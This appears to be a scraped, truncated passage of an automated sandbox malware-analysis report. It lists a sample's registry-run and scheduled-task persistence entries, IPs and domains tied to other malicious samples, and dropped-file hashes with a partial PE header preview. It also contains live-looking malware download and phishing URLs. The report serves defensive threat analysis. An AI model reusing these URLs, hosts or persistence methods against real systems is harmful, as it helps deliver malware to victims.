                                                                                                                                                07:10:25AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MyStart C:\Users\user\AppData\Local\Temp\IXP000.TMP\ef.exe
                                                                                                                                                07:10:42AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MyStart C:\Users\user\AppData\Local\Temp\IXP000.TMP\ef.exe
                                                                                                                                                07:11:00AutostartRun: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce {3746f21b-c990-4045-bb33-1cf98cff7a68} "C:\ProgramData\Package Cache\{3746f21b-c990-4045-bb33-1cf98cff7a68}\VC_redist.x64.exe" /burn.runonce
                                                                                                                                                07:11:14Task SchedulerRun new task: Adblock Fast path: C:\Users\user\Programs\Adblock\Adblock.exe s>--autorun
                                                                                                                                                07:11:18AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adblock Fast.lnk
                                                                                                                                                07:12:08Task SchedulerRun new task: Firefox Default Browser Agent A2083D782A7D92EC path: C:\Users\user\AppData\Roaming\uggiret
                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                104.21.34.132file.exeGet hashmaliciousBrowse
                                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                                    r6vSLIt8Yc.exeGet hashmaliciousBrowse
                                                                                                                                                      jZA5pGdsOM.exeGet hashmaliciousBrowse
                                                                                                                                                        xpIXNVvKy7.exeGet hashmaliciousBrowse
                                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                                            Ht1uEZwFmT.exeGet hashmaliciousBrowse
                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                file.exeGet hashmaliciousBrowse
                                                                                                                                                                  R2axoid4If.exeGet hashmaliciousBrowse
                                                                                                                                                                    x9rKinpIYb.exeGet hashmaliciousBrowse
                                                                                                                                                                      RSg2UWbVWV.exeGet hashmaliciousBrowse
                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                          LBPv87JqjI.exeGet hashmaliciousBrowse
                                                                                                                                                                            AHy2heusTp.exeGet hashmaliciousBrowse
                                                                                                                                                                              72JrEIo9FX.exeGet hashmaliciousBrowse
                                                                                                                                                                                mLtELLXIJs.exeGet hashmaliciousBrowse
                                                                                                                                                                                  SecuriteInfo.com.W32.Mokes.G.genEldorado.9275.exeGet hashmaliciousBrowse
                                                                                                                                                                                    SecuriteInfo.com.W32.Mokes.G.genEldorado.4480.exeGet hashmaliciousBrowse
                                                                                                                                                                                      k2PpV0RYpk.exeGet hashmaliciousBrowse
                                                                                                                                                                                        92.53.96.116Price Quotes.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • ch00943.tmweb.ru/mic/brave.exe
                                                                                                                                                                                        Quotes.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • cv75663.tmweb.ru/mike/bravegram.exe
                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                        g.agametog.comfile.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 34.142.181.181
                                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 34.142.181.181
                                                                                                                                                                                        r6vSLIt8Yc.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 34.142.181.181
                                                                                                                                                                                        cTV91otaRZ.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 34.142.181.181
                                                                                                                                                                                        trOYutdCjR.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 34.142.181.181
                                                                                                                                                                                        jZA5pGdsOM.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 34.142.181.181
                                                                                                                                                                                        xpIXNVvKy7.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 34.142.181.181
                                                                                                                                                                                        H8IFeGC5hn.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 34.142.181.181
                                                                                                                                                                                        Ht1uEZwFmT.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 34.142.181.181
                                                                                                                                                                                        E4FB39B3F6AA19028CCDD531437E7994A9B6F62B317AD.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 34.142.181.181
                                                                                                                                                                                        YvlGaSDIRZ.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 34.142.181.181
                                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 34.142.181.181
                                                                                                                                                                                        nxg4q72Iys.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 34.142.181.181
                                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 34.142.181.181
                                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 34.142.181.181
                                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 34.142.181.181
                                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 34.142.181.181
                                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 34.142.181.181
                                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 34.142.181.181
                                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 34.142.181.181
                                                                                                                                                                                        cdn.computewall.comfile.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 104.26.2.25
                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                        CLOUDFLARENETUSfile.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 104.26.1.100
                                                                                                                                                                                        16F1F5B4DE94BC49205E1CDD8ADB3B4ED2C482952CA07.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.133.215
                                                                                                                                                                                        16F1F5B4DE94BC49205E1CDD8ADB3B4ED2C482952CA07.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 104.20.68.143
                                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 104.26.1.100
                                                                                                                                                                                        https://www.ne16.com/t/4016513/70602841/2927387/1/124665/?f8785874=aHR0cHM6Ly95cnJ5LnBybz9lPWJXbHJaUzV6ZEc5M1FISm9aV2x1YldWMFlXeHNMbU52YlE9PQ==Get hashmaliciousBrowse
                                                                                                                                                                                        • 104.16.169.131
                                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.70.233
                                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.70.233
                                                                                                                                                                                        Xerox_Scan_88451.htmGet hashmaliciousBrowse
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 104.26.0.100
                                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 104.26.1.100
                                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 104.26.1.100
                                                                                                                                                                                        7ADpIopHPA.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 162.159.135.232
                                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 104.26.1.100
                                                                                                                                                                                        https://puhsd210-my.sharepoint.com/:o:/g/personal/gomes_phoenixunion_org/EqAmXpu2ybJDkF0b3Rki3WsB7yVhF1HTy7OSqceDGIUfuQ?e=5:gWLIUJ&at=9Get hashmaliciousBrowse
                                                                                                                                                                                        • 104.16.169.131
                                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 104.26.1.100
                                                                                                                                                                                        https://ecora-my.sharepoint.com/:o:/g/personal/darryl_haddrell_ecora_ca/El6shlQE8P9LoubsTzvMjZUB6pXs5jwMSUbEAHlav-O7xA?e=B5Ee9zGet hashmaliciousBrowse
                                                                                                                                                                                        • 104.17.24.14
                                                                                                                                                                                        https://indd.adobe.com/view/d793c045-cc39-4fe8-88e3-df5c163e9be0Get hashmaliciousBrowse
                                                                                                                                                                                        • 104.17.25.14
                                                                                                                                                                                        Voicemail Audio Transcription.htmGet hashmaliciousBrowse
                                                                                                                                                                                        • 104.18.11.207
                                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 104.26.0.100
                                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.70.233
                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                        a0e9f5d64349fb13191bc781f81f42e1Nissan_car_lease_agreement (sln).jsGet hashmaliciousBrowse
                                                                                                                                                                                        • 23.79.157.152
                                                                                                                                                                                        • 13.32.99.56
                                                                                                                                                                                        Motivation_letter_to_extend_employment_contract (dn).jsGet hashmaliciousBrowse
                                                                                                                                                                                        • 23.79.157.152
                                                                                                                                                                                        • 13.32.99.56
                                                                                                                                                                                        https://michaelpageuk5ukln.com/michael-pageGet hashmaliciousBrowse
                                                                                                                                                                                        • 23.79.157.152
                                                                                                                                                                                        • 13.32.99.56
                                                                                                                                                                                        loader_zip.jsGet hashmaliciousBrowse
                                                                                                                                                                                        • 23.79.157.152
                                                                                                                                                                                        • 13.32.99.56
                                                                                                                                                                                        Difference_between_framework_agreement_and_dynamic_purchasing_system (rki).jsGet hashmaliciousBrowse
                                                                                                                                                                                        • 23.79.157.152
                                                                                                                                                                                        • 13.32.99.56
                                                                                                                                                                                        Loi_sur_la_gestion_contractuelle.jsGet hashmaliciousBrowse
                                                                                                                                                                                        • 23.79.157.152
                                                                                                                                                                                        • 13.32.99.56
                                                                                                                                                                                        Va_private_road_maintenance_agreement_form (wjz).jsGet hashmaliciousBrowse
                                                                                                                                                                                        • 23.79.157.152
                                                                                                                                                                                        • 13.32.99.56
                                                                                                                                                                                        loader_zip.jsGet hashmaliciousBrowse
                                                                                                                                                                                        • 23.79.157.152
                                                                                                                                                                                        • 13.32.99.56
                                                                                                                                                                                        Divorce_after_separation_agreement (pnlhh).jsGet hashmaliciousBrowse
                                                                                                                                                                                        • 23.79.157.152
                                                                                                                                                                                        • 13.32.99.56
                                                                                                                                                                                        Sag-aftra_television_agreement_2019.jsGet hashmaliciousBrowse
                                                                                                                                                                                        • 23.79.157.152
                                                                                                                                                                                        • 13.32.99.56
                                                                                                                                                                                        DGEngSetup5461432.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 23.79.157.152
                                                                                                                                                                                        • 13.32.99.56
                                                                                                                                                                                        DGEngSetup5461432.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 23.79.157.152
                                                                                                                                                                                        • 13.32.99.56
                                                                                                                                                                                        Helicopter_sale_and_purchase_agreement (vi).jsGet hashmaliciousBrowse
                                                                                                                                                                                        • 23.79.157.152
                                                                                                                                                                                        • 13.32.99.56
                                                                                                                                                                                        agent.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 23.79.157.152
                                                                                                                                                                                        • 13.32.99.56
                                                                                                                                                                                        Specific_goods_agreement (uh).jsGet hashmaliciousBrowse
                                                                                                                                                                                        • 23.79.157.152
                                                                                                                                                                                        • 13.32.99.56
                                                                                                                                                                                        Permanent_seasonal_agreement (ew).jsGet hashmaliciousBrowse
                                                                                                                                                                                        • 23.79.157.152
                                                                                                                                                                                        • 13.32.99.56
                                                                                                                                                                                        Usda_annual_lease_agreement_certification_statement (kg).jsGet hashmaliciousBrowse
                                                                                                                                                                                        • 23.79.157.152
                                                                                                                                                                                        • 13.32.99.56
                                                                                                                                                                                        Antivirus_Upgrade_Cloud.e2550b79e6f94ab.jseGet hashmaliciousBrowse
                                                                                                                                                                                        • 23.79.157.152
                                                                                                                                                                                        • 13.32.99.56
                                                                                                                                                                                        Wingstop_franchise_agreement (pyz).jsGet hashmaliciousBrowse
                                                                                                                                                                                        • 23.79.157.152
                                                                                                                                                                                        • 13.32.99.56
                                                                                                                                                                                        Mutual_agreement_definition_contracts (bdu).jsGet hashmaliciousBrowse
                                                                                                                                                                                        • 23.79.157.152
                                                                                                                                                                                        • 13.32.99.56
                                                                                                                                                                                        37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 188.72.236.239
                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                        • 104.21.25.158
                                                                                                                                                                                        • 172.67.68.80
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 188.72.236.239
                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                        • 104.21.25.158
                                                                                                                                                                                        • 172.67.68.80
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 188.72.236.239
                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                        • 104.21.25.158
                                                                                                                                                                                        • 172.67.68.80
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 188.72.236.239
                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                        • 104.21.25.158
                                                                                                                                                                                        • 172.67.68.80
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        Xerox_Scan_88451.htmGet hashmaliciousBrowse
                                                                                                                                                                                        • 188.72.236.239
                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                        • 104.21.25.158
                                                                                                                                                                                        • 172.67.68.80
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 188.72.236.239
                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                        • 104.21.25.158
                                                                                                                                                                                        • 172.67.68.80
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 188.72.236.239
                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                        • 104.21.25.158
                                                                                                                                                                                        • 172.67.68.80
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 188.72.236.239
                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                        • 104.21.25.158
                                                                                                                                                                                        • 172.67.68.80
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 188.72.236.239
                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                        • 104.21.25.158
                                                                                                                                                                                        • 172.67.68.80
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 188.72.236.239
                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                        • 104.21.25.158
                                                                                                                                                                                        • 172.67.68.80
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        https://gainful-sophisticated-fiber.glitch.me/junk.htmlGet hashmaliciousBrowse
                                                                                                                                                                                        • 188.72.236.239
                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                        • 104.21.25.158
                                                                                                                                                                                        • 172.67.68.80
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        https://puhsd210-my.sharepoint.com/:o:/g/personal/gomes_phoenixunion_org/EqAmXpu2ybJDkF0b3Rki3WsB7yVhF1HTy7OSqceDGIUfuQ?e=5:gWLIUJ&at=9Get hashmaliciousBrowse
                                                                                                                                                                                        • 188.72.236.239
                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                        • 104.21.25.158
                                                                                                                                                                                        • 172.67.68.80
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 188.72.236.239
                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                        • 104.21.25.158
                                                                                                                                                                                        • 172.67.68.80
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        https://agcontractinginc.squarespace.com/Get hashmaliciousBrowse
                                                                                                                                                                                        • 188.72.236.239
                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                        • 104.21.25.158
                                                                                                                                                                                        • 172.67.68.80
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        Facturas Pagadas al Vencimiento.vbsGet hashmaliciousBrowse
                                                                                                                                                                                        • 188.72.236.239
                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                        • 104.21.25.158
                                                                                                                                                                                        • 172.67.68.80
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        9XTRGl7YTD.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 188.72.236.239
                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                        • 104.21.25.158
                                                                                                                                                                                        • 172.67.68.80
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        Statement of invoices Staement ID 41250.htmlGet hashmaliciousBrowse
                                                                                                                                                                                        • 188.72.236.239
                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                        • 104.21.25.158
                                                                                                                                                                                        • 172.67.68.80
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        #Ud83d#Udda8ATT-Approved.htmGet hashmaliciousBrowse
                                                                                                                                                                                        • 188.72.236.239
                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                        • 104.21.25.158
                                                                                                                                                                                        • 172.67.68.80
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        4DxDfazY1r.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 188.72.236.239
                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                        • 104.21.25.158
                                                                                                                                                                                        • 172.67.68.80
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        http://fmtrack.s2mtraining.com/v1/clk/rDxCyCxeQc2N451FGA-XnA,69pDe2NrTb2BBhvNfbKJnw,0,aHR0cHM6Ly9wLTByLm9ubGluZT9lPXJqYWNvd2xlZmZAaWNvbmVjdGl2LmNvbQ==Get hashmaliciousBrowse
                                                                                                                                                                                        • 188.72.236.239
                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                        • 104.21.25.158
                                                                                                                                                                                        • 172.67.68.80
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                        :y (copy)l39HA25qjw.exeGet hashmaliciousBrowse
                                                                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          0FD92B50776A2DC358C9CB6D7C322423E3872F8E3C66E.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            0FD92B50776A2DC358C9CB6D7C322423E3872F8E3C66E.exeGet hashmaliciousBrowse
                                                                                                                                                                                                              oHmQcfP7nu.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                        uuHuf0rg3c.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              0psvFgbWXS.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):946776
                                                                                                                                                                                                                                Entropy (8bit):6.630605981477972
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24576:LErOxpVnqgt5ExLh27RQlf7Yfq2WZz2a1BB69:L86pqeE74aB0Sdia1W9
                                                                                                                                                                                                                                MD5:6987E4CD3F256462F422326A7EF115B9
                                                                                                                                                                                                                                SHA1:71672A495B4603ECFEC40A65254CB3BA8766BBE0
                                                                                                                                                                                                                                SHA-256:3E26723394ADE92F8163B5643960189CB07358B0F96529A477D37176D68AA0A0
                                                                                                                                                                                                                                SHA-512:4B1D7F7FFEE39A2D65504767BEEDDD4C3374807A93889B14E7E73DB11E478492DEC349AEDCA03CE828F21A66BB666A68D3735443F4249556E10825A4CD7DFEB4
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                • Antivirus: Metadefender, Detection: 4%, Browse
                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                • Filename: l39HA25qjw.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                • Filename: 0FD92B50776A2DC358C9CB6D7C322423E3872F8E3C66E.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                • Filename: 0FD92B50776A2DC358C9CB6D7C322423E3872F8E3C66E.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                • Filename: oHmQcfP7nu.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                • Filename: uuHuf0rg3c.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                • Filename: 0psvFgbWXS.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L.....$b.........."...............................@.......................................@...@.......@.....................t...|....P..P............L..X&...0..Xv...........................C..........@............................................text...f........................... ..`.rdata..............................@..@.data...\p.......H..................@....rsrc...P....P......................@..@.reloc..Xv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Tue Oct 4 05:11:05 2022, mtime=Tue Oct 4 05:11:06 2022, atime=Thu Jul 21 11:58:20 2022, length=5818752, window=hide
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1065
                                                                                                                                                                                                                                Entropy (8bit):4.902392625618221
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:8mpkk6i4mZ7Y11gCdhWNlcW/lKp1xSSyjAOva8cb6wbywuLAwW+Gq+Gdv4t2YCBn:8mpkHm93gsN2WQ/CAOwRygCGFGLJTvm
                                                                                                                                                                                                                                MD5:9F8A502C3D63AD8A59B5C7C8DA18637C
                                                                                                                                                                                                                                SHA1:FA5E15348C7788FFF4CEDEBC7E24F27802DB95E6
                                                                                                                                                                                                                                SHA-256:935AB04C1BCD563F005E413205AE1B214B82F2B6D0A8336B021E34360095DA16
                                                                                                                                                                                                                                SHA-512:B786638B4244062F0CD5FB8CD64AD3BDA363715BC4675B8E6DD381F263E8D9FACA60A90E83CC25180736A1AE933971F4B734B80D49F8A9CD692817F87EDBCCA7
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:L..................F.... ...........zT.......~b.......X.....................z.:..DG..Yr?.D..U..k0.&...&........{.S....[^....."...........t...CFSF..1.....DUc1..Programs....t.Y^...H.g.3..(.....gVA.G..k...B......DUc1DUc1....w!......................2.P.r.o.g.r.a.m.s...D.V.1.....DUf1..Adblock.@......DUc1DUf1.....!....................k.b.A.d.b.l.o.c.k.....b.2...X..TJg .Adblock.exe.H......DUc1DUd1....`"........................A.d.b.l.o.c.k...e.x.e.......[...............-.......Z...........L.h.....C:\Users\user\Programs\Adblock\Adblock.exe..8.....\.....\.....\.....\.....\.U.s.e.r.s.\.A.r.t.h.u.r.\.P.r.o.g.r.a.m.s.\.A.d.b.l.o.c.k.\.A.d.b.l.o.c.k...e.x.e. .C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.P.r.o.g.r.a.m.s.\.A.d.b.l.o.c.k.........|....I.J.H..K..:...`.......X.......172892..............n4UB.. .|..o2..@.C.....P..#.....n4UB.. .|..o2..@.C.....P..#.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6.7.-.2.9.6.9.5.8.8.3.8.2.-.3.7.7.8.2.2.2.4.1.4.-.1.0.0.1.........
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                                                                Entropy (8bit):0.9495095248094744
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:0NF1pmI4sahU1exfovXIxcQvc6QcEscw3f+HbHg/8BRTf3jFa9qLnkzQt21eXTAR:MnEI4+mBUWIjf24qhMDu76RfAIO8/
                                                                                                                                                                                                                                MD5:07258A515612D61E46336D80E71F77D6
                                                                                                                                                                                                                                SHA1:21B714EB58504A4802AC440DC26831FCA6B6FA7F
                                                                                                                                                                                                                                SHA-256:EAA41581959103EF9B916AFD87717880464F88F02B49CEDF7F6D533E3BE76244
                                                                                                                                                                                                                                SHA-512:BD325D479BC6B3B350E693081B235F8A6823033C608C31ED447FF3E863EE5BFAB02465CEC115257ABA6A5B444DFDFF1A32FF09CFC4E089F5310AFCEE26FB7CD4
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.3.7.4.2.6.6.9.5.4.0.8.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.0.9.3.3.7.4.2.8.5.8.5.5.9.5.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.e.a.0.1.3.f.7.-.2.7.7.9.-.4.8.8.b.-.8.7.d.3.-.a.8.b.b.0.1.7.b.3.2.7.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.8.9.e.a.b.2.5.-.e.5.e.d.-.4.3.6.6.-.a.f.a.0.-.1.f.4.1.d.4.1.1.5.3.c.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.E.f.R.h.f.n.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.d.8.-.0.0.0.1.-.0.0.1.5.-.a.c.e.e.-.8.0.f.b.b.7.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.2.f.a.1.2.b.0.8.5.9.1.b.e.b.7.a.2.2.d.5.3.8.d.e.b.8.a.1.7.8.d.0.0.0.0.f.f.f.f.!.0.0.0.0.a.b.e.a.d.c.e.e.8.d.9.f.0.0.c.6.c.c.d.b.0.f.9.d.3.3.e.d.d.1.0.0.6.a.0.7.9.3.8.4.!.E.f.R.h.f.n.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.5.
                                                                                                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                                                                Entropy (8bit):0.7937284256554038
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:6OFUT0sjhkB75OCSKvXIxcQbc6DhcE0cw3ObmY+HbHg/opAnQcmMIDV9RjOyWCN6:tA0Dm1JOaAjQ0Du76RfAlx8Ckc
                                                                                                                                                                                                                                MD5:99000AF260FAF9BD3BE4CF32284923FA
